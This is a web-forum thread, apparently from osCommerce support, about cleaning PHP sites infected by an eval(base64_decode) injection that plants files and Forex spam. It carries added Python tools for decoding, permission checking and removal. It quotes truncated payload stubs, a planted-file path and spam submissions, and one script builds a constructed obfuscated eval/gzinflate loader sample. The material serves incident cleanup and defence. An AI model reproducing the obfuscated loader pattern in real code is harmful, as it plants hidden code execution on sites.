
eval(base64_decode Hack


FIMBLE


Here is another question:

 

1) Let's say I find out where the hack was done and erase the file... Is there a need then to still remove from all my files the <? /**/eval(base64_decode('aWYo......

 

Would it cause any harm at all now that I have removed the source file?

Would I be penalized by search engines?

 

I have about 10 different PHP scripts on my hosting account (blogs, forums, etc.) and they have all been infected!

 

2) How are they able to add that code to all pages, even if they have permissions lower than 755?

 

I am so pissed off right now :angry:

 

Ricardo


Hey Nic, thank you for your replies!

 

I can't seem to find the decoder for "gzdecode" or "gzinflate". Do you happen to know of a link or a script I can use to decode the rest?

 

Thanks!

 

It's a bad hack for sure. You need to remove all traces of the code, for thoroughness and the security of your site; to leave it is not a good idea.

Also remove filemanager.php and its links, then rename the admin.

 

Nic

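Ricardo asks above for a decoder for the gzinflate/base64 layers. The following is an added example, not code from the thread or from osCommerce: it peels nested base64_decode() and gzinflate() layers (PHP's gzinflate is raw DEFLATE, so zlib with a negative window size decodes it) and then lists the absolute paths and URLs that the final, readable layer names, which is how the planted files Nic points to later in the thread get located. The three-layer sample it decodes is constructed for the demonstration with a placeholder path, not a real payload, and the function names are mine.

```python
import base64
import binascii
import re
import zlib

# One obfuscation layer as the thread describes it: base64_decode('...'),
# optionally wrapped in gzinflate(...). The eval() around it is not needed to match.
LAYER = re.compile(
    r"(?P<gz>gzinflate\s*\(\s*)?base64_decode\s*\(\s*['\"](?P<b64>[A-Za-z0-9+/=]+)['\"]\s*\)"
)
PATH_RE = re.compile(r"(?<![\w/])/(?:[\w.-]+/)+[\w.-]+")   # absolute paths like /home/.../x.php
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_layer(text):
    """Return the next decoded layer of `text`, or None when nothing recognisable is left."""
    m = LAYER.search(text)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group("b64"))
        if m.group("gz"):
            raw = zlib.decompress(raw, -15)  # gzinflate() == raw DEFLATE, no zlib/gzip header
    except (binascii.Error, zlib.error):
        return None  # not actually base64/deflate data: stop rather than guess
    return raw.decode("utf-8", errors="replace")


def unwrap(text, max_layers=10):
    """Peel nested layers until plain PHP remains; returns every layer, outermost first."""
    layers = [text]
    while len(layers) <= max_layers:
        nxt = decode_layer(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def indicators(final_layer):
    """Absolute paths and URLs named in the fully decoded code: the planted files to go and remove."""
    return sorted(set(PATH_RE.findall(final_layer)) | set(URL_RE.findall(final_layer)))


def build_sample():
    """Constructed three-layer sample in the shape the thread describes; not a real payload.
    The path inside is a placeholder, not one taken from any infected site."""
    inner = "<?php @include('/home/EXAMPLE/html/blog/wp-includes/dropped.php'); ?>"
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, what PHP gzdeflate() makes
    gz = deflater.compress(inner.encode()) + deflater.flush()
    middle = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(gz).decode()
    outer = "<?php //eval(base64_decode('%s')); ?>\n<?php\n// ordinary page code follows\n" % (
        base64.b64encode(middle.encode()).decode())
    return outer


if __name__ == "__main__":
    layers = unwrap(build_sample())
    for i, layer in enumerate(layers):
        print("layer %d: %s" % (i, layer[:70]))
    print("indicators:", indicators(layers[-1]))
```

Run it against the contents of one infected file instead of build_sample() to get the same layered view; anything the last layer includes, writes or fetches is what to look for on disk.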

Can someone tell me whether there is a way to remove the hacker's code from each file by using a search and replace application? If so, can you recommend one and explain basically what to do?

 

thanks

 

Ricardo


Search and replace is the fastest way to do it if you do not have a backup to restore from.

Copy the top two lines; they should be the malicious code and the <?php tag.

Like this: add this to the search box,

<?php //eval(base64_decode('...')); ?>
<?php

 

In the replace box add

<?php

 

then go search and replace.

 

This will be OK for stock osC pages, but you will still need to search for pages that use <? rather than <?php, as some contributions do, or your own custom pages.

 

Nic

Sometimes you're the dog and sometimes the lamp post


If you have not yet decoded the eval code, this is where the files to be removed are to be found:

 

/home/xxxxxx/x/x/x/xxxxxxx/html/xxxxxxx/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php

 

I added the X's to protect your usernames.

 

There could be anything up to 40-odd files placed in this folder that do not belong.

Nic


I have a renamed admin directory and have deleted filemanager.php and references to it.

 

I have the Site Monitor contribution installed

 

My Questions,

1. Will Site Monitor spot the hack, or does the hack disable Site Monitor?

 

2. I have all folders at 755 and the two configure.php files at 400. Is this correct, or should the folders be lower?

 

Martin

Live shop Phoenix 1.0.8.4 on PHP 7.4 Working my way up the versions.


1) The new Site Monitor does give you hints; however, you should use it with caution, as it lists all files that contain eval, which does exist in osCommerce as part of the official code to evaluate strings as PHP code.

So you will get reports of possible infection when none exists.

It's still a good thing to get used to, though, and it will notify you of changes to your files, which the attack will certainly make.

 

2) Read post #2 about permissions, as Matt makes a good point.

 

Though for most hosts 755 and 400 is good.

The 400 worries me a little, as a lot of sites will not function at this level, which leads me to think that maybe you are one of the people Matt is talking about.

You will need to check with your host.

 

Nic


It's worth noting that ownership is as important as permissions. If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777. If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories.

 

A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that.
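Matt's point that ownership decides whether 755 is safe can be checked mechanically. As an added example, not part of the thread, this script applies the Unix rule (the owner bits apply if the web server's uid owns the entry, otherwise the group bits if its gid matches, otherwise the "other" bits) to every file and directory under a store root and reports what the web user could modify. The web server's uid and gid and the store root are assumptions supplied by the caller; the demo builds a throwaway tree owned by the current user, which stands in for the "web user owns the files" case found on many shared hosts, where the thread's 444/555 settings are the ones that actually close the door.

```python
import os
import stat
import tempfile


def writable_by(mode, owner_uid, owner_gid, web_uid, web_gids):
    """Unix write check for the web server's account: owner bits apply when it owns
    the entry, otherwise group bits when its groups include the entry's group,
    otherwise the 'other' bits. Returns a reason string, or None if it cannot write."""
    if owner_uid == web_uid:
        return "owned by the web user with owner-write set" if mode & stat.S_IWUSR else None
    if owner_gid in web_gids:
        return "group-writable by a group the web user is in" if mode & stat.S_IWGRP else None
    return "world-writable" if mode & stat.S_IWOTH else None


def scan_tree(root, web_uid, web_gids):
    """Map relative path -> (octal mode, reason) for everything the web user could change."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for entry in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            st = os.lstat(entry)
            if stat.S_ISLNK(st.st_mode):
                continue  # judge the link target where it lives, not the link itself
            reason = writable_by(st.st_mode, st.st_uid, st.st_gid, web_uid, web_gids)
            if reason:
                findings[os.path.relpath(entry, root)] = (oct(stat.S_IMODE(st.st_mode)), reason)
    return findings


def demo():
    """Constructed tree owned by the current user, scanned as if that user were the web server:
    755 directories and 644 files then show up as writable; a 444 configure.php does not."""
    root = tempfile.mkdtemp()
    os.chmod(root, 0o755)
    os.mkdir(os.path.join(root, "images"))
    os.chmod(os.path.join(root, "images"), 0o755)
    for name, mode in (("index.php", 0o644), ("configure.php", 0o444)):
        path = os.path.join(root, name)
        open(path, "w").close()
        os.chmod(path, mode)
    return scan_tree(root, web_uid=os.getuid(), web_gids={os.getgid()})


if __name__ == "__main__":
    for path, (mode, reason) in sorted(demo().items()):
        print("%-15s %s  %s" % (path, mode, reason))
```

On a real host, pass the uid the PHP processes run under (the "web user" Martin asked about; your host can tell you, or look at the owner of the Apache/PHP processes) and the store's catalog directory; an empty result for the code directories is the state Matt describes, with only upload and cache directories, if any, left writable on purpose.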

 

 


Thanks Nic

 

I use United Hosting and have always had folders at 755 and configures at 400, no perceivable problems, store works fine since its launch in June.

 

I am confused by the term "web user". I have my own domain name with a non-shared SSL, but on a shared server. Am I the web user? If not, who is?

 

Should I be setting my files to 444 and folders to 555? I think United can handle these settings, but if you explain what is correct it will help me immensely.

 

Martin


The easiest way, other than asking your host, is to set the permissions of the configure.php file to 644 and see if you get the red error warning across the top of your site.

If so, then you are likely to need to set your permissions lower. I have to say the host you mention does have a totally fantastic name for itself.

Nic


Just found out I've been done as well, and the advice in this thread has been brilliant.

 

They hid the files in catalog/includes/languages/german/modules/newsletters!! There were about 40 or so files there.

 

Not surprised to find them hidden in the German language, as I never look there. Needless to say, all other languages have now been deleted.

 

Does anyone know if cPanel has a compare/delete tool in it? It would just be easier than manually deleting all the code.

 

Thanks


eval(base64_decode hack going around the internet,

 

I found this bit of code (if you're on a Linux/Unix server) very valuable in removing hacks like the one above.

Change it to fit your specifics and use at your own risk.

 

find . -name "*.php" -exec sed -e '/eval(base64_decode*/d' -i.bak {} \;

 

Navigate to your root/catalog directory to execute. It will recursively find every file ending with "php"; create a backup of the file with a ".bak" extension; within the file it will find and replace ANY line containing "eval(base64_decode*"; then save the edited original file. You must edit "*.php" to process the files pertaining to your site. You must edit "eval(base64_decode*" to match a unique snippet of the hack code (try to avoid strings that contain weird characters (/.*&!`~, etc.) that need escaping, to make your life easy).

 

As already noted you will probably need to fix/remove file_manager.php plus find and delete the deep planted files.

A current backup is always easier.

Yulem

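Both Nic's search-and-replace instructions and Yulem's sed one-liner remove the injected line. As an added example, not from the thread, this script does the same job in Python: it matches the whole injected <?php //eval(base64_decode('...')); ?> statement rather than the line it sits on, so the page's own opening tag survives whether it is <?php or the short <? form that some contributions use, a copy appended to an existing line is still caught, and ordinary calls to base64_decode() without eval() are left alone. It runs as a dry run by default and, when told to write, backs each file up to .bak first, as the sed version does. The sample tree in demo() is constructed, and the file and function names are mine.

```python
import re
import shutil
import tempfile
from pathlib import Path

# The injected statement as both posts describe it: a complete <?php ... ?> block holding
# eval(base64_decode('...')), usually on its own line above the page's real opening tag.
# Matching the statement (and the newline that follows it) keeps a following <? or <?php intact.
INJECTED = re.compile(
    rb"<\?php\s*(?://)?\s*eval\s*\(\s*base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]+['\"]\s*\)\s*\)\s*;?\s*\?>[ \t]*\r?\n?"
)


def clean_bytes(data):
    """Strip every injected block from one file's bytes; returns (cleaned, removed_count)."""
    return INJECTED.subn(b"", data)


def clean_tree(root, dry_run=True):
    """Walk `root` for *.php files; report infected ones and, unless dry_run, back up and rewrite."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.php")):
        original = path.read_bytes()  # bytes, so odd encodings and CRLF endings pass through untouched
        cleaned, n = clean_bytes(original)
        if n == 0:
            continue
        report[str(path.relative_to(root))] = n
        if not dry_run:
            shutil.copy2(path, path.with_name(path.name + ".bak"))
            path.write_bytes(cleaned)
    return report


def demo():
    """Constructed throwaway tree: a stock <?php page, a <? contribution page, an untouched page.
    The 'aWYo' payload is a placeholder of the kind shown earlier in the thread, not real code."""
    tmp = Path(tempfile.mkdtemp())
    (tmp / "index.php").write_bytes(b"<?php //eval(base64_decode('aWYo')); ?>\n<?php\necho 'stock page';\n")
    (tmp / "contrib.php").write_bytes(b"<?php //eval(base64_decode('aWYo')); ?>\n<?\necho 'contribution';\n")
    (tmp / "clean.php").write_bytes(b"<?php\necho 'never infected';\n")
    preview = clean_tree(tmp)                 # dry run first: nothing is written
    report = clean_tree(tmp, dry_run=False)   # then back up and rewrite
    after = {p.name: p.read_bytes() for p in tmp.glob("*.php")}
    backups = sorted(p.name for p in tmp.glob("*.bak"))
    return preview, report, after, backups


if __name__ == "__main__":
    preview, report, after, backups = demo()
    print("would change:", preview)
    print("changed:", report, "backups:", backups)
```

As with the sed version, this only removes the line that infects every page; the dropped files in the deep directories and the open filemanager.php still have to be dealt with separately.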

Question

 

I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

I'm sure some hacker woke up one morning and decide to hack a million web sites.

 

And while he was at it advertise the company you mentioned just for "grins and giggles".

 

I'm sure no money changed hands.

 

Quite sure that's what happened....

:-"

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 


Permissions are not the determining factor for this attack; it's the presence of the admin folder still called admin, and the filemanager.php.

Once in, it will spread to any PHP file, platform/package independent, adding its code as it goes.

I can imagine in a lot of cases there will be many more PHP files than osC ones.

 

Typically, the hack has nothing to do with the admin folder name or the presence of filemanager.php. It is the fact that the admin directory is unsecured and does not require a log-in to access the folder.

 

If you can go to http://www.yourstore.com/admin (replace 'yourstore.com' with your domain and 'admin' with your admin folder name) and you get your store administration page without having to enter a username and password, then you are open to this hack.


You can tell me if I am incorrect, but this hack actively looks for, amongst others, the osid, then the admin folder, and the easy way in: the filemanager.php.

I don't fully understand what you mean about the admin folder. Are you referring to the login page of V2.2RC2A, or the actual admin index as in V2.2MS where no protection is available?

This is surely why renaming the admin folder and removing the filemanager.php is the recommended course of action.


I was recently asked by Harald to review this new layer of protection that gives you additional htaccess protection.

 

http://github.com/haraldpdl/oscommerce2/commit/fd5dff7a3c45511b4902780c67f9609e700dbb51

if used in conjunction with

http://github.com/haraldpdl/oscommerce2/commit/569917f654edab2b07bf61ab8caf2764ba1457c4

it gives you a single login via htaccess.

 

Here are some screenshots of it:

[Screenshots: administrators.jpg, administrators2.jpg, administrators3.jpg]

 

Nic


I also have been hacked and found the malicious code. I banned an IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious.

 

I used the decode hack and it didn't work for me. Can someone tell me which files were planted and need to be removed?

 

What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked.

 

Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body.

 

Hey. This is the exact same thing with me. My website seems to work fine, with the exception that, no matter what I do lately, my website has a very poor ranking compared to what it had a couple of months ago, in spite of all of the optimization I have done with Web SEO. Actually, although I had noticed the eval base64 code at the top of all of my PHP files and didn't know what it was, it was using the Web SEO program and discovering all of the lines of text of keyword saturation in the body of my website with all of this "forex" trading stuff.

 

So, yeah, how best to go about cleaning up my website of all of the malicious code so it doesn't re-perpetuate itself? I am not familiar with using dbase decoders. :'(


I keep getting emails through an email script on my site, and I keep getting more and more. Any ideas what the heck this is? A spammer? Here's a couple of them:

 

eVRbqY _a href="http://xighsaxkazdh.com/"_xighsaxkazdh_/a_, [ url =http://pujvjjvvxcmv.com/]pujvjjvvxcmv[ /url ], [ link=http://sdxfkydlkpxn.com/]sdxfkydlkpxn[ /link], http://xmteuhyhgedt.com/

heres one that all the fields were filled in:



Name: hsxkwn
Email: [email protected]
Phone: 80253357799
State: New Mexico
Entered By: customer
2009-10-05 18:15:08

--------------------------------------------------------------------------------
Engine Info:
Engine Type: outboard

--------------------------------------------------------------------------------

Question / Comments: (edit)


tXx0i6 _a href="http://poqjzafyogxj.com/"_poqjzafyogxj_/a_, [url=http://shqfoyuzkbpm.com/]shqfoyuzkbpm[/url], [link=http://yxsbjpmnpqzl.com/]yxsbjpmnpqzl[/link], http://pwkihzcpjtzv.com/


 

Maybe this is how its getting in or maybe this has nothing to do with it.

Thanks


 

How to prevent infection.

 

This is not guaranteed 100% proof but it is going to help stop re-infection.

 

Change the name of your admin folder to something less obvious.

Delete admin/filemanager.php and associated links.

Ensure that your folder permissions are never set higher than 755.

Install some security addons.

Also, some ideas from this post can help you.

If you do nothing, and do not rename your admin folder or delete the filemanager.php, it is not a question of if, more of when.

There is a lot of fragmented help on the forums; I have pulled some of it together here. Read up all you can; there are a lot of great people posting good information here.

 

Nic,

Should admin/define_language.php also be removed?

~ Don't mistake my kindness for weakness ~


Hi All,

 

Looks like I too was a victim of this hack... Now I have restored a backup from before the hack took place, but now I cannot access the admin panel... I put it in the browser and all it shows is a blank page in Firefox... Anyone have any ideas?

 

All the files are in there... I have even tried using the standard install files... nothing :(
